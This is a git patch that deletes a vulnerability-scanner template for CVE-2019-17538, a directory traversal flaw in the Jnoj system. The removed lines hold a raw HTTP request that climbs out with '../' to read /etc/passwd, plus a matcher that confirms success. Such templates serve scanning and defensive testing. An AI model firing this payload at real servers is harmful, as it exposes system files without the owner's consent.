From 0a768b9d954d47736e5d574b3888532151609857 Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Mon, 1 Mar 2021 16:58:56 +0530 Subject: [PATCH] Delete CVE-2019-17538.yaml --- cves/CVE-2019-17538.yaml | 21 --------------------- 1 file changed, 21 deletions(-) delete mode 100644 cves/CVE-2019-17538.yaml diff --git a/cves/CVE-2019-17538.yaml b/cves/CVE-2019-17538.yaml deleted file mode 100644 index d42aa4f3eb..0000000000 --- a/cves/CVE-2019-17538.yaml +++ /dev/null @@ -1,21 +0,0 @@ -id: CVE-2019-17538 -info: - name: Jnoj Directory Traversal for file reading(LFI) - author: pussycat0x - severity: High - reference: https://github.com/shi-yang/jnoj/issues/53 - tegs: cve.cve2019,jnoj,cms -requests: - - raw: - - | - GET /jnoj/web/polygon/problem/viewfile?id=1&name=../../../../../../../etc/passwd HTTP/1.1 - Content-Type: application/x-www-form-urlencoded - matchers-conditions: and - matchers: - - type : regex - regex: - - "root:[x*]:0:0" - - type: status - status: - - 200 -